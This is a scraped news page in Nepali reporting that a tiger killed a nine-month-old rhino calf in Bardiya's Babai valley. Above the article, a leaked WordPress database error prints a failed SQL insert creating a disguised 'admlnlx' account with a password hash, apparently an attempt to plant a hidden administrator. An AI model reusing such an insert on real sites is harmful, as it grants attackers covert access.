WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEs/RP5rXXVEjItImkj.1Kve3CjHuy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 10:36:44', '', 'admlnlx', 'admlnlx')
वर्दिया,माघ ३-
बर्दियाको बबई उपत्यकामा बाघले ९ महिनाको गैंडाको बच्चा (केटो) मारेको छ ।
चितवनबाट गत वर्षको फागुनमा लगिएको गैंडाबाट गत जेठ ९ गते जन्मिएको भाले बच्चा (केटो) आइतबार दिउँसो बबई गुठीक्षेत्रको सानोश्रीस्थित् बबई नदी किनारमा बाघले मारेको हो ।
माघ १ गतेसम्म माउसँगै रहेको उक्त बच्चा आइतबार दिउँसो करिब ३:४० बजे बाघले मारेको अवस्थामा फेला परेको बर्दिया निकुञ्जका निमित्त प्रमुख संरक्षण अधिकृत रमेशकुमार थापाले सोमबार निकुञ्ज विभागलाई जानकारी गराएका छन् ।
जेठ ९ गते बबईको गुठीक्षेत्रमा उक्त केटो जन्मिएको थियो ।